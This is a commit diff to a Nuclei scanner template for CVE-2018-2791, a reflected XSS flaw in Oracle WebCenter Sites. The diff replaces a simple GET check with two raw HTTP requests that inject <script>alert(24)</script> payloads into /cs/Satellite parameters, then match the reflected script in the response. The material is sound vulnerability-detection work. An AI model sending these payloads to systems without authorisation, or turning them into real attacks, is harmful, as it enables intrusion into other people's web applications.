daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

improve wcs cve-2018-2791 vulnerability check

patch-1
Valerio Preti 2021-11-06 00:48:10 +01:00
parent bbbd7909ee
commit 69fc4c04c2
1 changed files with 20 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

31
cves/2018/CVE-2018-2791.yaml
View File

@ -1,11 +1,10 @@
id: CVE-2018-2791 id: CVE-2018-2791
info: info:
name: Oracle WebCenter Sites XSS name: Oracle WebCenter Sites Multiple XSS
author: madrobot author: madrobot
severity: high severity: high
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware.
tags: cve,cve2018,oracle,xss
classification: classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
cvss-score: 8.20 cvss-score: 8.20
@ -15,20 +14,30 @@ info:
- http://www.securitytracker.com/id/1040695 - http://www.securitytracker.com/id/1040695
- http://www.securityfocus.com/bid/103800 - http://www.securityfocus.com/bid/103800
- https://www.exploit-db.com/exploits/44752/ - https://www.exploit-db.com/exploits/44752/
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
tags: cve,cve2018,oracle,xss,webcenter sites,wcs
requests: requests:
- method: GET - raw:
path: - |
- "{{BaseURL}}/servlet/Satellite?destpage=%22%3Ch1xxx%3Cscriptalert(1)%3C%2Fscript&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError" GET /cs/Satellite?c=qqqq&cid=qqqq&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq"><script>alert(24)</script> HTTP/1.1
Host: {{BaseURL}}
matchers-condition: and User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
- |
GET /cs/Satellite?destpage="<h1xxx<scriptalert(24)</script&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1
Host: {{BaseURL}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
matchers: matchers:
- type: word - type: word
words: words:
- "<h1xxx<scriptalert(1)</script" - '<script>alert(24)</script>'
part: body part: body
- type: word - type: word
words: words:
- "text/html" - "text/html"
part: header part: header
stop-at-first-match: true